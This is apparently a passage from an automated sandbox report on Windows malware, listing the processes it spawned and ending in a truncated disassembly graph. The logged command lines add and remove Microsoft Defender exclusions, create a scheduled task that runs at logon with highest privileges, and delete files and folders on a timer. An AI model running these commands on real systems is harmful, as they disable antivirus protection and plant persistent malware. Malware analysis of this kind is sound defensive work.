                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c start "" "C:\Windows\System32\bav64.exe"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:66
                                                                                                                              Start time:01:36:39
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:67
                                                                                                                              Start time:01:36:39
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\bav64.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\bav64.exe"
                                                                                                                              Imagebase:0x7ff67b600000
                                                                                                                              File size:3'193'856 bytes
                                                                                                                              MD5 hash:DBE920F6626DB0DDCC757F787C855DF4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 42%, ReversingLabs
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:68
                                                                                                                              Start time:01:36:39
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:69
                                                                                                                              Start time:01:36:40
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:70
                                                                                                                              Start time:01:36:40
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:71
                                                                                                                              Start time:01:36:40
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:72
                                                                                                                              Start time:01:36:40
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:73
                                                                                                                              Start time:01:36:40
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\timeout.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:timeout /t 14 /nobreak
                                                                                                                              Imagebase:0x7ff7bf9e0000
                                                                                                                              File size:32'768 bytes
                                                                                                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:74
                                                                                                                              Start time:01:36:40
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:75
                                                                                                                              Start time:01:36:40
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:76
                                                                                                                              Start time:01:36:40
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:77
                                                                                                                              Start time:01:36:41
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\console_zero.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\console_zero.exe
                                                                                                                              Imagebase:0x7ff7f1c50000
                                                                                                                              File size:664'576 bytes
                                                                                                                              MD5 hash:A11604F5C925DDAADF2988AF05F4071B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:78
                                                                                                                              Start time:01:36:41
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\svcldr64.dat"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:79
                                                                                                                              Start time:01:36:41
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:80
                                                                                                                              Start time:01:36:41
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\timeout.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:timeout /t 16 /nobreak
                                                                                                                              Imagebase:0x7ff7bf9e0000
                                                                                                                              File size:32'768 bytes
                                                                                                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:81
                                                                                                                              Start time:01:36:42
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:82
                                                                                                                              Start time:01:36:42
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:83
                                                                                                                              Start time:01:36:43
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff643350000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:84
                                                                                                                              Start time:01:36:43
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:85
                                                                                                                              Start time:01:36:43
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:86
                                                                                                                              Start time:01:36:44
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:87
                                                                                                                              Start time:01:36:45
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:88
                                                                                                                              Start time:01:36:45
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:89
                                                                                                                              Start time:01:36:46
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:90
                                                                                                                              Start time:01:36:46
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:91
                                                                                                                              Start time:01:36:49
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:92
                                                                                                                              Start time:01:36:49
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:93
                                                                                                                              Start time:01:36:49
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:94
                                                                                                                              Start time:01:36:49
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:95
                                                                                                                              Start time:01:36:49
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:96
                                                                                                                              Start time:01:36:52
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:97
                                                                                                                              Start time:01:36:52
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:98
                                                                                                                              Start time:01:36:54
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:99
                                                                                                                              Start time:01:36:54
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:100
                                                                                                                              Start time:01:36:56
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:101
                                                                                                                              Start time:01:36:56
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:102
                                                                                                                              Start time:01:36:59
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:103
                                                                                                                              Start time:01:36:59
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:false

                                                                                                                              Disassembly

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:7.1%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:8.2%
                                                                                                                                Total number of Nodes:1267
                                                                                                                                Total number of Limit Nodes:61
                                                                                                                                execution_graph 18862 7ff71277c9a4 18863 7ff71277c9bd 18862->18863 18864 7ff71277c9b9 18862->18864 18875 7ff712786f68 GetEnvironmentStringsW 18863->18875 18867 7ff71277c9ca 18869 7ff712781270 __free_lconv_num 13 API calls 18867->18869 18868 7ff71277c9d6 18882 7ff71277ca14 18868->18882 18869->18864 18872 7ff712781270 __free_lconv_num 13 API calls 18873 7ff71277c9fd 18872->18873 18874 7ff712781270 __free_lconv_num 13 API calls 18873->18874 18874->18864 18876 7ff712786f8c 18875->18876 18877 7ff71277c9c2 18875->18877 18878 7ff712783880 _fread_nolock 14 API calls 18876->18878 18877->18867 18877->18868 18879 7ff712786fc3 _Yarn 18878->18879 18880 7ff712781270 __free_lconv_num 13 API calls 18879->18880 18881 7ff712786fe3 FreeEnvironmentStringsW 18880->18881 18881->18877 18883 7ff71277ca3c 18882->18883 18884 7ff7127803c0 _set_fmode 13 API calls 18883->18884 18885 7ff71277ca77 18884->18885 18887 7ff71277cae8 18885->18887 18890 7ff7127803c0 _set_fmode 13 API calls 18885->18890 18891 7ff71277cb0b 18885->18891 18896 7ff71277cb1f 18885->18896 18897 7ff71277ca7f 18885->18897 18899 7ff712781270 __free_lconv_num 13 API calls 18885->18899 18901 7ff712784ef4 18885->18901 18886 7ff712781270 __free_lconv_num 13 API calls 18888 7ff71277c9de 18886->18888 18889 7ff712781270 __free_lconv_num 13 API calls 18887->18889 18888->18872 18889->18888 18890->18885 18910 7ff71277cb34 18891->18910 18895 7ff712781270 __free_lconv_num 13 API calls 18895->18897 18898 7ff71277b048 _invalid_parameter_noinfo_noreturn 17 API calls 18896->18898 18897->18886 18900 7ff71277cb31 18898->18900 18899->18885 18902 7ff712784f0b 18901->18902 18903 7ff712784f01 18901->18903 18904 7ff71277b1d0 _set_fmode 13 API calls 18902->18904 18903->18902 18907 7ff712784f27 18903->18907 18909 7ff712784f13 18904->18909 18905 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 18906 7ff712784f1f 18905->18906 18906->18885 18907->18906 18908 7ff71277b1d0 _set_fmode 13 API calls 18907->18908 18908->18909 18909->18905 18914 7ff71277cb39 18910->18914 18915 7ff71277cb13 18910->18915 18911 7ff71277cb62 18912 7ff712781270 __free_lconv_num 13 API calls 18911->18912 18912->18915 18913 7ff712781270 __free_lconv_num 13 API calls 18913->18914 18914->18911 18914->18913 18915->18895 18656 7ff71277cdb6 18657 7ff71277efe0 __GSHandlerCheck_EH 36 API calls 18656->18657 18658 7ff71277cdbb 18657->18658 18659 7ff71277ce2b 18658->18659 18660 7ff71277cde1 GetModuleHandleW 18658->18660 18668 7ff71277ccc4 18659->18668 18660->18659 18663 7ff71277cdee 18660->18663 18662 7ff71277ce8c 18663->18659 18680 7ff71277ced0 GetModuleHandleExW 18663->18680 18664 7ff71277ce67 18664->18662 18675 7ff71277cea0 18664->18675 18686 7ff71277b23c EnterCriticalSection 18668->18686 18670 7ff71277cce0 18671 7ff71277ccfc 13 API calls 18670->18671 18672 7ff71277cce9 18671->18672 18673 7ff71277b290 BuildCatchObjectHelperInternal LeaveCriticalSection 18672->18673 18674 7ff71277ccf1 18673->18674 18674->18664 18676 7ff71277cebd 18675->18676 18677 7ff71277ceac GetCurrentProcess TerminateProcess 18675->18677 18678 7ff71277ced0 3 API calls 18676->18678 18677->18676 18679 7ff71277cec4 ExitProcess 18678->18679 18681 7ff71277cf04 GetProcAddress 18680->18681 18682 7ff71277cf22 18680->18682 18685 7ff71277cf16 18681->18685 18683 7ff71277cf2e 18682->18683 18684 7ff71277cf27 FreeLibrary 18682->18684 18683->18659 18684->18683 18685->18682 21309 7ff7127651d0 21314 7ff7127651f6 21309->21314 21315 7ff7127651fd 21309->21315 21310 7ff7127736e0 std::_Xinvalid_argument 8 API calls 21311 7ff712765358 21310->21311 21312 7ff712765283 21312->21314 21318 7ff712779314 21312->21318 21314->21310 21315->21312 21315->21314 21316 7ff7127652f7 21315->21316 21316->21314 21317 7ff71277a064 67 API calls 21316->21317 21317->21314 21319 7ff712779344 21318->21319 21322 7ff712779148 21319->21322 21321 7ff71277935d 21321->21314 21323 7ff71277916e 21322->21323 21324 7ff7127791a3 21322->21324 21325 7ff71277af40 _invalid_parameter_noinfo_noreturn 35 API calls 21323->21325 21340 7ff712779ca8 EnterCriticalSection 21324->21340 21339 7ff712779190 21325->21339 21339->21321 21347 7ff71278d5df 21350 7ff712779cb4 LeaveCriticalSection 21347->21350 19163 7ff712764be0 19164 7ff712764bf8 19163->19164 19168 7ff712764c04 _Yarn 19163->19168 19165 